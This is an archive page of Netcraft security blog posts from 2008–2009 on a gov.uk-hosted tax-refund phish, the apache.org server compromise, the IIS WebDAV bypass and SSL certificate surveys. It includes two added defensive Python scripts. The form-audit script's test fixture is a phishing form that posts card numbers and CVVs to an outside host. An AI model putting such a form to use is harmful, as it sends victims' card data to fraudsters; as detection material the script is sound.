An ongoing phishing attack against UK taxpayers is being given additional credibility by using a gov.uk domain. Sefton Council is hosting the phishing content on its Novell GroupWise 7.0 site at web11.sefton.gov.uk.

The phish follows a ploy commonly seen in HMRC and IRS phishing attacks: the victim is led to believe that they can receive a tax refund by submitting their full credit card details, but these details are instead sent directly to the fraudster behind the attack.

[Image: gov-uk-phish-resized.png]

The fraudulent form submits the victim's details to a PHP script hosted at www.zamoh.biz.

[Image: gov-uk-phish-action.png]

The UK's Central Office of Information is responsible for deciding who can register gov.uk domains. Eligibility is strictly limited, which helps to preserve the integrity of the gov.uk namespace; however, this obviously has an undesirable effect when this integrity is leveraged by fraudulent content on compromised servers. Netcraft has informed Sefton Council about this phishing attack.

Netcraft provides an Automated Vulnerability Scanning service which regularly tests your internet infrastructure, supplies the information you need to maintain your security and eliminate vulnerabilities, and audits that it has found no serious vulnerabilities using a dynamically generated seal.

Posted by Paul Mutton at 1 September 2009 in Security
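
For the gov.uk phishing item above, a site owner can audit hosted pages for forms that collect card or password fields and post them to a different host. This is an added example, not Netcraft's code; the sample HTML, the URL paths and the `SENSITIVE` keyword list are constructed assumptions, and only the two hostnames come from the article.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SENSITIVE = ("card", "cvv", "cvc", "expiry", "password")  # assumed keyword list

# Constructed sample pages; the paths are made up for illustration.
PHISH_URL = "http://web11.sefton.gov.uk/refund/index.html"
PHISH_HTML = """<form method="post" action="http://www.zamoh.biz/collect.php">
<input name="fullname"><input name="cardnumber"><input name="cvv" />
</form>"""
BENIGN_HTML = """<form action="/search"><input name="q"></form>
<form action="login"><input name="password" type="password"></form>"""


class FormAudit(HTMLParser):
    """Collect each <form>'s resolved action URL and its field names."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.forms, self._current = page_url, [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the page itself.
            target = urljoin(self.page_url, a.get("action") or "")
            self._current = {"action": target, "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def offsite_sensitive_forms(page_url, html):
    """Return forms with sensitive fields whose action host differs from the page host."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    audit = FormAudit(page_url)
    audit.feed(html)
    findings = []
    for form in audit.forms:
        host = (urlsplit(form["action"]).hostname or "").lower()
        hits = sorted({f for f in form["fields"] if any(k in f for k in SENSITIVE)})
        if hits and host != page_host:
            findings.append({"posts_to": host, "sensitive_fields": hits})
    return findings
```

Comparing exact hostnames also flags legitimate cross-subdomain posts, so findings are candidates for review rather than verdicts.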

Apache.org has been offline for 3 hours this morning, after one of their servers was compromised. Their sites were displaying the message:

[Image: apache-compromise.png]

The message goes on to say that the compromise is "not due to any software exploits in Apache itself", but was instead due to a compromised SSH key.

Update: Most of apache.org's sites have been back online this afternoon after they switched over to servers not compromised in the attack. Apache have released more information about the incident: an account used for backups was compromised on a back-end server. This server distributes content to Apache's public web servers, so the attackers used it to distribute scripts to the web servers; once the scripts were public, the attackers could execute them remotely, gaining access to the web servers as well. But these rogue processes were detected, so the servers were taken offline for investigation and clean-up.

Posted by Colin Phipps at 28 August 2009 in Security

The most recent Netcraft Web Server Survey found more than 62 million websites running Microsoft IIS 6.0, but many of these are unlikely to be affected by the latest WebDAV remote authentication bypass vulnerability.

A new WebDAV vulnerability was published by Nikolaos Rangos on Friday, detailing how attackers can bypass access restrictions using a flaw in the WebDAV functionality on IIS 6.0. By failing to handle Unicode tokens properly, the bug gives attackers access to password-protected folders and, in some cases, the ability to upload files to the affected web servers.

Although IIS 6.0 accounts for more than 90% of the Microsoft sites on the Internet, the total number of vulnerable sites is likely to be substantially less than 62 million because WebDAV is not a default component of IIS 6.0 when a Windows Server 2003 machine is given the role of Application Server. Nonetheless, some people may install and enable WebDAV to provide a convenient means of publishing and managing web server content through firewalls – because WebDAV is an extension to the HTTP protocol, it can operate over the same port number as HTTP.

Microsoft issued a security advisory on Monday, which also lists IIS 5.0 as vulnerable. This issue may affect a much larger proportion of the 2.8 million IIS 5.0 websites as, unlike its successor, Windows 2000 Server automatically installs WebDAV alongside IIS 5.0.

Posted by Paul Mutton at 20 May 2009 in Security
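
For the IIS WebDAV item above, exposure depends on whether WebDAV is enabled, not just on the IIS version, so an inventory check has to look at both. This is an added example, not Netcraft's or Microsoft's code; the two OPTIONS responses are constructed samples, and treating a `DAV` header or advertised WebDAV methods as "WebDAV enabled" is a heuristic assumption.

```python
# Added example; the two OPTIONS responses below are constructed samples.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE", "PROPPATCH"}
ADVISORY_VERSIONS = {"5.0", "6.0"}  # IIS versions the article says are affected

IIS6_WITH_DAV = """HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
MS-Author-Via: DAV
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
"""
IIS6_NO_DAV = """HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Allow: OPTIONS, TRACE, GET, HEAD, POST
"""


def parse_headers(raw):
    """Return {lower-cased header name: value}; repeated headers are joined."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:   # skip the status line
        if not line.strip():
            break                               # end of header block
        name, _, value = line.partition(":")
        key, value = name.strip().lower(), value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return headers


def webdav_exposure(raw):
    """Classify one OPTIONS response: is WebDAV on, and on an affected IIS?"""
    h = parse_headers(raw)
    server = h.get("server", "")
    version = server.split("/", 1)[1] if server.lower().startswith("microsoft-iis/") else None
    advertised = f"{h.get('allow', '')},{h.get('public', '')}"
    methods = {m.strip().upper() for m in advertised.split(",") if m.strip()}
    enabled = "dav" in h or bool(methods & WEBDAV_METHODS)
    return {
        "iis_version": version,
        "webdav_enabled": enabled,
        "needs_review": enabled and version in ADVISORY_VERSIONS,
        "write_methods": sorted(methods & WRITE_METHODS),
    }


if __name__ == "__main__":
    for sample in (IIS6_WITH_DAV, IIS6_NO_DAV):
        print(webdav_exposure(sample))
```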

Two years after their first appearance in the Netcraft SSL Survey, there are now more than 11 thousand Extended Validation (EV) SSL certificates in use on the Web. Despite enjoying two years of continued growth, EV SSL certificates still only make up around 1% of all SSL certificates in use on the Internet.

[Image: ebuyer-ev-ssl.png]
Nearly all modern browsers now support EV SSL certificates by colouring all or part of the address bar in green.

[Chart: EV SSL Growth - 2 Years]

The proportion of EV SSL certificates rises considerably amongst the world's busiest websites, as shown by Netcraft's top 1 million sites dataset. In general, it seems, the more traffic an SSL site has, the more likely it is to use an EV certificate, and in particular, more than a quarter of the SSL certificates within the top 1,000 sites have extended validation.

| Population | SSL Certificates | EV SSL Certificates | EV SSL Share |
|---|---|---|---|
| All Sites | 1,028,868 | 11,300 | 1.1% |
| Top 1,000,000 | 45,851 | 2,662 | 5.8% |
| Top 100,000 | 7,012 | 710 | 10.1% |
| Top 10,000 | 712 | 115 | 16.2% |
| Top 1,000 | 60 | 17 | 28.3% |

Posted by Paul Mutton at 27 February 2009 in Security

A new wave of phishing attacks against eBay is exploiting a clever combination of wildcard DNS records and cross-site scripting (XSS) vulnerabilities to use other people's websites to help steal credentials from victims.

Related Netcraft Service: Web Application Security Testing
Posted by Paul Mutton at 17 February 2009 in Security


Related Netcraft Service: SSL Survey
Posted by Colin Phipps at 8 January 2009 in Security

Netcraft's SSL Survey shows that 14% of valid third-party SSL certificates are using MD5 signatures — an algorithm that is demonstrably vulnerable to attack.



Related Netcraft Service: SSL Survey
Posted by Colin Phipps at 1 January 2009 in Security

Netcraft has detected another live vulnerability on a Yahoo website, which is currently being used to steal authentication cookies from its users — transmitting them to a website under the control of a remote attacker. The attacker can then use the stolen details to gain access to his victims' Yahoo accounts, such as Yahoo Mail.

Related Netcraft Service: Web Application Security Testing
Posted by Paul Mutton at 26 October 2008 in Security

Netcraft's Phishing Site Takedown and Countermeasures service helps banks respond to phishing attacks promptly and effectively.
Posted by Paul Mutton at 9 September 2008 in Netcraft Services, Security

Netcraft's June SSL Survey has found that a significant number of SSL certificates are affected by the Debian OpenSSL vulnerability, including Extended Validation SSL certificates and certificates belonging to banks.

Related Netcraft Service: SSL Survey
Posted by Paul Mutton at 12 June 2008 in Security